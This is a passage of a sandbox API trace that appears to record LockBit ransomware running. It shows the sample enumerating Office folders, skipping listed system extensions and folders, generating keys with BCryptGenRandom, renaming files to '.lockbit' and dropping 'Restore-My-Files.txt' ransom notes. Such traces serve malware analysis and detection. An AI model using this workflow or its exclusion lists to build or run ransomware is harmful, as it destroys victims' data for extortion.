lpString2=".WMF") returned -1 [0202.528] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0202.528] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0202.528] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0202.528] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0202.528] wsprintfW (in: param_1=0x3d6a668, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\AUTOSHAP\\BD18257_.WMF.lockbit") returned 79 [0202.528] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\AUTOSHAP\\BD18257_.WMF" (normalized: "c:\\program files\\microsoft office\\media\\office14\\autoshap\\bd18257_.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x2a8 [0202.530] CreateIoCompletionPort (FileHandle=0x2a8, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0202.530] malloc (_Size=0x40068) returned 0x3df0008 [0202.530] GetFileSizeEx (in: hFile=0x2a8, lpFileSize=0x3df0020 | out: lpFileSize=0x3df0020*=4842) returned 1 [0202.530] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0202.530] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0202.530] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3003c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3003c) returned 0x0 [0202.530] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0202.531] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0202.531] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3004c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3004c) returned 0x0 [0202.531] ReadFile (in: hFile=0x2a8, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0202.545] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\AUTOSHAP\\BD18257_.WMF.lockbit", NtPathName=0x3d6acc0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\AUTOSHAP\\BD18257_.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0202.545] malloc (_Size=0xb4) returned 0x1fa2ed8 [0202.545] NtSetInformationFile (FileHandle=0x2a8, IoStatusBlock=0x3d6aa8c, FileInformation=0x1fa2ed8, Length=0xb4, FileInformationClass=0xa) returned 0x0 [0202.718] free (_Block=0x1fa2ed8) [0202.718] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\AUTOSHAP\\BD18257_.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\AUTOSHAP") returned 1 [0202.719] wsprintfW (in: param_1=0x3d6a878, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\AUTOSHAP\\Restore-My-Files.txt") returned 79 [0202.719] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\AUTOSHAP\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\media\\office14\\autoshap\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0202.719] FindNextFileW (in: hFindFile=0x55fe78, lpFindFileData=0x3d6b120 | out: lpFindFileData=0x3d6b120*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb3d1f1c0, ftCreationTime.dwHighDateTime=0x1d6047d, ftLastAccessTime.dwLowDateTime=0xb3d1f1c0, ftLastAccessTime.dwHighDateTime=0x1d6047d, ftLastWriteTime.dwLowDateTime=0xb3d45320, ftLastWriteTime.dwHighDateTime=0x1d6047d, nFileSizeHigh=0x0, nFileSizeLow=0x472, dwReserved0=0x0, dwReserved1=0x0, cFileName="Restore-My-Files.txt", cAlternateFileName="RESTOR~1.TXT")) returned 1 [0202.719] lstrcmpiW (lpString1=".", lpString2="Restore-My-Files.txt") returned -1 [0202.719] lstrcmpiW (lpString1="..", lpString2="Restore-My-Files.txt") returned -1 [0202.719] PathFindExtensionW (pszPath="Restore-My-Files.txt") returned=".txt" [0202.719] lstrcmpiW (lpString1=".386", lpString2=".txt") returned -1 [0202.719] lstrcmpiW (lpString1=".cmd", lpString2=".txt") returned -1 [0202.719] lstrcmpiW (lpString1=".exe", lpString2=".txt") returned -1 [0202.719] lstrcmpiW (lpString1=".ani", lpString2=".txt") returned -1 [0202.719] lstrcmpiW (lpString1=".adv", lpString2=".txt") returned -1 [0202.719] lstrcmpiW (lpString1=".theme", lpString2=".txt") returned -1 [0202.719] lstrcmpiW (lpString1=".msi", lpString2=".txt") returned -1 [0202.719] lstrcmpiW (lpString1=".msp", lpString2=".txt") returned -1 [0202.719] lstrcmpiW (lpString1=".com", lpString2=".txt") returned -1 [0202.719] lstrcmpiW (lpString1=".diagpkg", lpString2=".txt") returned -1 [0202.719] lstrcmpiW (lpString1=".nls", lpString2=".txt") returned -1 [0202.719] lstrcmpiW (lpString1=".diagcab", lpString2=".txt") returned -1 [0202.719] lstrcmpiW (lpString1=".lock", lpString2=".txt") returned -1 [0202.719] lstrcmpiW (lpString1=".ocx", lpString2=".txt") returned -1 [0202.719] lstrcmpiW (lpString1=".mpa", lpString2=".txt") returned -1 [0202.719] lstrcmpiW (lpString1=".cpl", lpString2=".txt") returned -1 [0202.720] lstrcmpiW (lpString1=".mod", lpString2=".txt") returned -1 [0202.720] lstrcmpiW (lpString1=".hta", lpString2=".txt") returned -1 [0202.720] lstrcmpiW (lpString1=".icns", lpString2=".txt") returned -1 [0202.720] lstrcmpiW (lpString1=".prf", lpString2=".txt") returned -1 [0202.720] lstrcmpiW (lpString1=".rtp", lpString2=".txt") returned -1 [0202.720] lstrcmpiW (lpString1=".diagcfg", lpString2=".txt") returned -1 [0202.720] lstrcmpiW (lpString1=".msstyles", lpString2=".txt") returned -1 [0202.720] lstrcmpiW (lpString1=".bin", lpString2=".txt") returned -1 [0202.720] lstrcmpiW (lpString1=".hlp", lpString2=".txt") returned -1 [0202.720] lstrcmpiW (lpString1=".shs", lpString2=".txt") returned -1 [0202.720] lstrcmpiW (lpString1=".drv", lpString2=".txt") returned -1 [0202.720] lstrcmpiW (lpString1=".wpx", lpString2=".txt") returned 1 [0202.720] lstrcmpiW (lpString1=".bat", lpString2=".txt") returned -1 [0202.720] lstrcmpiW (lpString1=".rom", lpString2=".txt") returned -1 [0202.720] lstrcmpiW (lpString1=".msc", lpString2=".txt") returned -1 [0202.720] lstrcmpiW (lpString1=".spl", lpString2=".txt") returned -1 [0202.720] lstrcmpiW (lpString1=".ps1", lpString2=".txt") returned -1 [0202.720] lstrcmpiW (lpString1=".msu", lpString2=".txt") returned -1 [0202.720] lstrcmpiW (lpString1=".ics", lpString2=".txt") returned -1 [0202.720] lstrcmpiW (lpString1=".key", lpString2=".txt") returned -1 [0202.720] lstrcmpiW (lpString1=".mp3", lpString2=".txt") returned -1 [0202.720] lstrcmpiW (lpString1=".reg", lpString2=".txt") returned -1 [0202.720] lstrcmpiW (lpString1=".dll", lpString2=".txt") returned -1 [0202.720] lstrcmpiW (lpString1=".ini", lpString2=".txt") returned -1 [0202.720] lstrcmpiW (lpString1=".idx", lpString2=".txt") returned -1 [0202.720] lstrcmpiW (lpString1=".sys", lpString2=".txt") returned -1 [0202.720] lstrcmpiW (lpString1=".hlp", lpString2=".txt") returned -1 [0202.720] lstrcmpiW (lpString1=".ico", lpString2=".txt") returned -1 [0202.721] lstrcmpiW (lpString1=".lnk", lpString2=".txt") returned -1 [0202.721] lstrcmpiW (lpString1=".rdp", lpString2=".txt") returned -1 [0202.721] lstrcmpiW (lpString1=".lockbit", lpString2=".txt") returned -1 [0202.721] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="Restore-My-Files.txt") returned 0 [0202.721] FindNextFileW (in: hFindFile=0x55fe78, lpFindFileData=0x3d6b120 | out: lpFindFileData=0x3d6b120*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb3d1f1c0, ftCreationTime.dwHighDateTime=0x1d6047d, ftLastAccessTime.dwLowDateTime=0xb3d1f1c0, ftLastAccessTime.dwHighDateTime=0x1d6047d, ftLastWriteTime.dwLowDateTime=0xb3d45320, ftLastWriteTime.dwHighDateTime=0x1d6047d, nFileSizeHigh=0x0, nFileSizeLow=0x472, dwReserved0=0x0, dwReserved1=0x0, cFileName="Restore-My-Files.txt", cAlternateFileName="RESTOR~1.TXT")) returned 0 [0202.721] FindClose (in: hFindFile=0x55fe78 | out: hFindFile=0x55fe78) returned 1 [0202.721] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x5178e0b0, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0xbd42e760, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0xbd42e760, ftLastWriteTime.dwHighDateTime=0x1d305f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="BULLETS", cAlternateFileName="")) returned 1 [0202.721] lstrcmpiW (lpString1=".", lpString2="BULLETS") returned -1 [0202.721] lstrcmpiW (lpString1="..", lpString2="BULLETS") returned -1 [0202.721] lstrcmpiW (lpString1="BULLETS", lpString2="$windows.~bt") returned 1 [0202.721] lstrcmpiW (lpString1="BULLETS", lpString2="intel") returned -1 [0202.721] lstrcmpiW (lpString1="BULLETS", lpString2="msocache") returned -1 [0202.721] lstrcmpiW (lpString1="BULLETS", lpString2="$recycle.bin") returned 1 [0202.721] lstrcmpiW (lpString1="BULLETS", lpString2="$windows.~ws") returned 1 [0202.721] lstrcmpiW (lpString1="BULLETS", lpString2="tor browser") returned -1 [0202.721] lstrcmpiW (lpString1="BULLETS", lpString2="boot") returned 1 [0202.721] lstrcmpiW (lpString1="BULLETS", lpString2="system volume information") returned -1 [0202.721] lstrcmpiW (lpString1="BULLETS", lpString2="perflogs") returned -1 [0202.721] lstrcmpiW (lpString1="BULLETS", lpString2="google") returned -1 [0202.721] lstrcmpiW (lpString1="BULLETS", lpString2="application data") returned 1 [0202.721] lstrcmpiW (lpString1="BULLETS", lpString2="windows") returned -1 [0202.721] lstrcmpiW (lpString1="BULLETS", lpString2="windows.old") returned -1 [0202.721] lstrcmpiW (lpString1="BULLETS", lpString2="appdata") returned 1 [0202.721] lstrcmpiW (lpString1="BULLETS", lpString2="Windows nt") returned -1 [0202.721] lstrcmpiW (lpString1="BULLETS", lpString2="Msbuild") returned -1 [0202.722] lstrcmpiW (lpString1="BULLETS", lpString2="Microsoft") returned -1 [0202.722] lstrcmpiW (lpString1="BULLETS", lpString2="All users") returned 1 [0202.722] lstrcmpiW (lpString1="BULLETS", lpString2="mozilla") returned -1 [0202.722] lstrcmpiW (lpString1="BULLETS", lpString2="Microsoft.NET") returned -1 [0202.722] lstrcmpiW (lpString1="BULLETS", lpString2="microsoft shared") returned -1 [0202.722] lstrcmpiW (lpString1="BULLETS", lpString2="Internet Explorer") returned -1 [0202.722] lstrcmpiW (lpString1="BULLETS", lpString2="common files") returned -1 [0202.722] lstrcmpiW (lpString1="BULLETS", lpString2="opera") returned -1 [0202.722] lstrcmpiW (lpString1="BULLETS", lpString2="Windows Journal") returned -1 [0202.722] wsprintfW (in: param_1=0x3d6b928, param_2="%s\\%s" | out: param_1="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS") returned 57 [0202.722] wsprintfW (in: param_1=0x3d6ad00, param_2="%s\\*" | out: param_1="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\*") returned 59 [0202.722] FindFirstFileExW (in: lpFileName="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\*", fInfoLevelId=0x0, lpFindFileData=0x3d6b120, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x0 | out: lpFindFileData=0x3d6b120) returned 0x55fe78 [0202.776] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0202.776] FindNextFileW (in: hFindFile=0x55fe78, lpFindFileData=0x3d6b120 | out: lpFindFileData=0x3d6b120*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x5178e0b0, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0xbd42e760, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0xbd42e760, ftLastWriteTime.dwHighDateTime=0x1d305f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0202.895] lstrcmpiW (lpString1=".", lpString2="..") returned -1 [0202.896] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0202.896] FindNextFileW (in: hFindFile=0x55fe78, lpFindFileData=0x3d6b120 | out: lpFindFileData=0x3d6b120*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x992c8400, ftCreationTime.dwHighDateTime=0x1bd5de4, ftLastAccessTime.dwLowDateTime=0xbc847960, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0x992c8400, ftLastWriteTime.dwHighDateTime=0x1bd5de4, nFileSizeHigh=0x0, nFileSizeLow=0x967, dwReserved0=0x0, dwReserved1=0x0, cFileName="BD10253_.GIF", cAlternateFileName="")) returned 1 [0202.896] lstrcmpiW (lpString1=".", lpString2="BD10253_.GIF") returned -1 [0202.896] lstrcmpiW (lpString1="..", lpString2="BD10253_.GIF") returned -1 [0202.896] PathFindExtensionW (pszPath="BD10253_.GIF") returned=".GIF" [0202.896] lstrcmpiW (lpString1=".386", lpString2=".GIF") returned -1 [0202.896] lstrcmpiW (lpString1=".cmd", lpString2=".GIF") returned -1 [0202.896] lstrcmpiW (lpString1=".exe", lpString2=".GIF") returned -1 [0202.896] lstrcmpiW (lpString1=".ani", lpString2=".GIF") returned -1 [0202.896] lstrcmpiW (lpString1=".adv", lpString2=".GIF") returned -1 [0202.896] lstrcmpiW (lpString1=".theme", lpString2=".GIF") returned 1 [0202.896] lstrcmpiW (lpString1=".msi", lpString2=".GIF") returned 1 [0202.896] lstrcmpiW (lpString1=".msp", lpString2=".GIF") returned 1 [0202.896] lstrcmpiW (lpString1=".com", lpString2=".GIF") returned -1 [0202.896] lstrcmpiW (lpString1=".diagpkg", lpString2=".GIF") returned -1 [0202.896] lstrcmpiW (lpString1=".nls", lpString2=".GIF") returned 1 [0202.896] lstrcmpiW (lpString1=".diagcab", lpString2=".GIF") returned -1 [0202.896] lstrcmpiW (lpString1=".lock", lpString2=".GIF") returned 1 [0202.896] lstrcmpiW (lpString1=".ocx", lpString2=".GIF") returned 1 [0202.896] lstrcmpiW (lpString1=".mpa", lpString2=".GIF") returned 1 [0202.896] lstrcmpiW (lpString1=".cpl", lpString2=".GIF") returned -1 [0202.896] lstrcmpiW (lpString1=".mod", lpString2=".GIF") returned 1 [0202.896] lstrcmpiW (lpString1=".hta", lpString2=".GIF") returned 1 [0202.896] lstrcmpiW (lpString1=".icns", lpString2=".GIF") returned 1 [0202.896] lstrcmpiW (lpString1=".prf", lpString2=".GIF") returned 1 [0202.896] lstrcmpiW (lpString1=".rtp", lpString2=".GIF") returned 1 [0202.896] lstrcmpiW (lpString1=".diagcfg", lpString2=".GIF") returned -1 [0202.896] lstrcmpiW (lpString1=".msstyles", lpString2=".GIF") returned 1 [0202.896] lstrcmpiW (lpString1=".bin", lpString2=".GIF") returned -1 [0202.896] lstrcmpiW (lpString1=".hlp", lpString2=".GIF") returned 1 [0202.896] lstrcmpiW (lpString1=".shs", lpString2=".GIF") returned 1 [0202.896] lstrcmpiW (lpString1=".drv", lpString2=".GIF") returned -1 [0202.896] lstrcmpiW (lpString1=".wpx", lpString2=".GIF") returned 1 [0202.897] lstrcmpiW (lpString1=".bat", lpString2=".GIF") returned -1 [0202.897] lstrcmpiW (lpString1=".rom", lpString2=".GIF") returned 1 [0202.897] lstrcmpiW (lpString1=".msc", lpString2=".GIF") returned 1 [0202.897] lstrcmpiW (lpString1=".spl", lpString2=".GIF") returned 1 [0202.897] lstrcmpiW (lpString1=".ps1", lpString2=".GIF") returned 1 [0202.897] lstrcmpiW (lpString1=".msu", lpString2=".GIF") returned 1 [0202.897] lstrcmpiW (lpString1=".ics", lpString2=".GIF") returned 1 [0202.897] lstrcmpiW (lpString1=".key", lpString2=".GIF") returned 1 [0202.897] lstrcmpiW (lpString1=".mp3", lpString2=".GIF") returned 1 [0202.897] lstrcmpiW (lpString1=".reg", lpString2=".GIF") returned 1 [0202.897] lstrcmpiW (lpString1=".dll", lpString2=".GIF") returned -1 [0202.897] lstrcmpiW (lpString1=".ini", lpString2=".GIF") returned 1 [0202.897] lstrcmpiW (lpString1=".idx", lpString2=".GIF") returned 1 [0202.897] lstrcmpiW (lpString1=".sys", lpString2=".GIF") returned 1 [0202.897] lstrcmpiW (lpString1=".hlp", lpString2=".GIF") returned 1 [0202.897] lstrcmpiW (lpString1=".ico", lpString2=".GIF") returned 1 [0202.897] lstrcmpiW (lpString1=".lnk", lpString2=".GIF") returned 1 [0202.897] lstrcmpiW (lpString1=".rdp", lpString2=".GIF") returned 1 [0202.897] lstrcmpiW (lpString1=".lockbit", lpString2=".GIF") returned 1 [0202.897] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="BD10253_.GIF") returned 1 [0202.897] lstrcmpiW (lpString1="ntldr", lpString2="BD10253_.GIF") returned 1 [0202.897] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="BD10253_.GIF") returned 1 [0202.897] lstrcmpiW (lpString1="bootsect.bak", lpString2="BD10253_.GIF") returned 1 [0202.897] lstrcmpiW (lpString1="autorun.inf", lpString2="BD10253_.GIF") returned -1 [0202.897] lstrcmpiW (lpString1="thumbs.db", lpString2="BD10253_.GIF") returned 1 [0202.897] lstrcmpiW (lpString1="iconcache.db", lpString2="BD10253_.GIF") returned 1 [0202.897] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\") returned="" [0202.897] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD10253_.GIF") returned=".GIF" [0202.897] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1 [0202.897] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1 [0202.897] lstrcmpiW (lpString1=".7z", lpString2=".GIF") returned -1 [0202.897] lstrcmpiW (lpString1=".ckp", lpString2=".GIF") returned -1 [0202.897] lstrcmpiW (lpString1=".dacpac", lpString2=".GIF") returned -1 [0202.897] lstrcmpiW (lpString1=".db", lpString2=".GIF") returned -1 [0202.898] lstrcmpiW (lpString1=".db-shm", lpString2=".GIF") returned -1 [0202.898] lstrcmpiW (lpString1=".db-wal", lpString2=".GIF") returned -1 [0202.898] lstrcmpiW (lpString1=".db3", lpString2=".GIF") returned -1 [0202.898] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1 [0202.898] lstrcmpiW (lpString1=".dbc", lpString2=".GIF") returned -1 [0202.898] lstrcmpiW (lpString1=".dbs", lpString2=".GIF") returned -1 [0202.898] lstrcmpiW (lpString1=".dbt", lpString2=".GIF") returned -1 [0202.898] lstrcmpiW (lpString1=".dbv", lpString2=".GIF") returned -1 [0202.898] lstrcmpiW (lpString1=".frm", lpString2=".GIF") returned -1 [0202.898] lstrcmpiW (lpString1=".mdf", lpString2=".GIF") returned 1 [0202.898] lstrcmpiW (lpString1=".mrg", lpString2=".GIF") returned 1 [0202.898] lstrcmpiW (lpString1=".mwb", lpString2=".GIF") returned 1 [0202.898] lstrcmpiW (lpString1=".myd", lpString2=".GIF") returned 1 [0202.898] lstrcmpiW (lpString1=".ndf", lpString2=".GIF") returned 1 [0202.898] lstrcmpiW (lpString1=".qry", lpString2=".GIF") returned 1 [0202.898] lstrcmpiW (lpString1=".sdb", lpString2=".GIF") returned 1 [0202.898] lstrcmpiW (lpString1=".sdf", lpString2=".GIF") returned 1 [0202.898] lstrcmpiW (lpString1=".sql", lpString2=".GIF") returned 1 [0202.898] lstrcmpiW (lpString1=".sqlite", lpString2=".GIF") returned 1 [0202.898] lstrcmpiW (lpString1=".sqlite3", lpString2=".GIF") returned 1 [0202.898] lstrcmpiW (lpString1=".sqlitedb", lpString2=".GIF") returned 1 [0202.898] lstrcmpiW (lpString1=".tmd", lpString2=".GIF") returned 1 [0202.898] wsprintfW (in: param_1=0x3d6a668, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD10253_.GIF.lockbit") returned 78 [0202.898] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD10253_.GIF" (normalized: "c:\\program files\\microsoft office\\media\\office14\\bullets\\bd10253_.gif"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x2a8 [0202.900] CreateIoCompletionPort (FileHandle=0x2a8, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0202.901] malloc (_Size=0x40068) returned 0x3df0008 [0202.901] GetFileSizeEx (in: hFile=0x2a8, lpFileSize=0x3df0020 | out: lpFileSize=0x3df0020*=2407) returned 1 [0202.901] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0202.901] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0202.901] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3003c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3003c) returned 0x0 [0202.901] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0202.902] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0202.902] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3004c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3004c) returned 0x0 [0202.902] ReadFile (in: hFile=0x2a8, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 0x0 [0202.906] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD10253_.GIF.lockbit", NtPathName=0x3d6acc0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD10253_.GIF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0202.906] malloc (_Size=0xb2) returned 0x1fa2ed8 [0202.906] NtSetInformationFile (FileHandle=0x2a8, IoStatusBlock=0x3d6aa8c, FileInformation=0x1fa2ed8, Length=0xb2, FileInformationClass=0xa) returned 0xc0000008 [0202.906] free (_Block=0x1fa2ed8) [0202.906] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD10253_.GIF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS") returned 1 [0202.906] wsprintfW (in: param_1=0x3d6a878, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\Restore-My-Files.txt") returned 78 [0202.906] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\media\\office14\\bullets\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x2a8 [0202.911] CreateIoCompletionPort (FileHandle=0x2a8, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0202.911] malloc (_Size=0x40068) returned 0x3df0008 [0202.911] WriteFile (in: hFile=0x2a8, lpBuffer=0x1fa30f8, nNumberOfBytesToWrite=0x472, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x1fa30f8, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 0x0 [0202.913] FindNextFileW (in: hFindFile=0x55fe78, lpFindFileData=0x3d6b120 | out: lpFindFileData=0x3d6b120*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5dec3400, ftCreationTime.dwHighDateTime=0x1bd8f92, ftLastAccessTime.dwLowDateTime=0xbc847960, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0x5dec3400, ftLastWriteTime.dwHighDateTime=0x1bd8f92, nFileSizeHigh=0x0, nFileSizeLow=0xf0, dwReserved0=0x0, dwReserved1=0x0, cFileName="BD10254_.GIF", cAlternateFileName="")) returned 1 [0202.913] lstrcmpiW (lpString1=".", lpString2="BD10254_.GIF") returned -1 [0202.913] lstrcmpiW (lpString1="..", lpString2="BD10254_.GIF") returned -1 [0202.913] PathFindExtensionW (pszPath="BD10254_.GIF") returned=".GIF" [0202.913] lstrcmpiW (lpString1=".386", lpString2=".GIF") returned -1 [0202.913] lstrcmpiW (lpString1=".cmd", lpString2=".GIF") returned -1 [0202.913] lstrcmpiW (lpString1=".exe", lpString2=".GIF") returned -1 [0202.913] lstrcmpiW (lpString1=".ani", lpString2=".GIF") returned -1 [0202.913] lstrcmpiW (lpString1=".adv", lpString2=".GIF") returned -1 [0202.913] lstrcmpiW (lpString1=".theme", lpString2=".GIF") returned 1 [0202.913] lstrcmpiW (lpString1=".msi", lpString2=".GIF") returned 1 [0202.913] lstrcmpiW (lpString1=".msp", lpString2=".GIF") returned 1 [0202.913] lstrcmpiW (lpString1=".com", lpString2=".GIF") returned -1 [0202.913] lstrcmpiW (lpString1=".diagpkg", lpString2=".GIF") returned -1 [0202.913] lstrcmpiW (lpString1=".nls", lpString2=".GIF") returned 1 [0202.913] lstrcmpiW (lpString1=".diagcab", lpString2=".GIF") returned -1 [0202.913] lstrcmpiW (lpString1=".lock", lpString2=".GIF") returned 1 [0202.913] lstrcmpiW (lpString1=".ocx", lpString2=".GIF") returned 1 [0202.913] lstrcmpiW (lpString1=".mpa", lpString2=".GIF") returned 1 [0202.913] lstrcmpiW (lpString1=".cpl", lpString2=".GIF") returned -1 [0202.913] lstrcmpiW (lpString1=".mod", lpString2=".GIF") returned 1 [0202.913] lstrcmpiW (lpString1=".hta", lpString2=".GIF") returned 1 [0202.913] lstrcmpiW (lpString1=".icns", lpString2=".GIF") returned 1 [0202.913] lstrcmpiW (lpString1=".prf", lpString2=".GIF") returned 1 [0202.913] lstrcmpiW (lpString1=".rtp", lpString2=".GIF") returned 1 [0202.913] lstrcmpiW (lpString1=".diagcfg", lpString2=".GIF") returned -1 [0202.913] lstrcmpiW (lpString1=".msstyles", lpString2=".GIF") returned 1 [0202.913] lstrcmpiW (lpString1=".bin", lpString2=".GIF") returned -1 [0202.913] lstrcmpiW (lpString1=".hlp", lpString2=".GIF") returned 1 [0202.913] lstrcmpiW (lpString1=".shs", lpString2=".GIF") returned 1 [0202.913] lstrcmpiW (lpString1=".drv", lpString2=".GIF") returned -1 [0202.913] lstrcmpiW (lpString1=".wpx", lpString2=".GIF") returned 1 [0202.913] lstrcmpiW (lpString1=".bat", lpString2=".GIF") returned -1 [0202.913] lstrcmpiW (lpString1=".rom", lpString2=".GIF") returned 1 [0202.914] lstrcmpiW (lpString1=".msc", lpString2=".GIF") returned 1 [0202.914] lstrcmpiW (lpString1=".spl", lpString2=".GIF") returned 1 [0202.914] lstrcmpiW (lpString1=".ps1", lpString2=".GIF") returned 1 [0202.914] lstrcmpiW (lpString1=".msu", lpString2=".GIF") returned 1 [0202.914] lstrcmpiW (lpString1=".ics", lpString2=".GIF") returned 1 [0202.914] lstrcmpiW (lpString1=".key", lpString2=".GIF") returned 1 [0202.914] lstrcmpiW (lpString1=".mp3", lpString2=".GIF") returned 1 [0202.914] lstrcmpiW (lpString1=".reg", lpString2=".GIF") returned 1 [0202.914] lstrcmpiW (lpString1=".dll", lpString2=".GIF") returned -1 [0202.914] 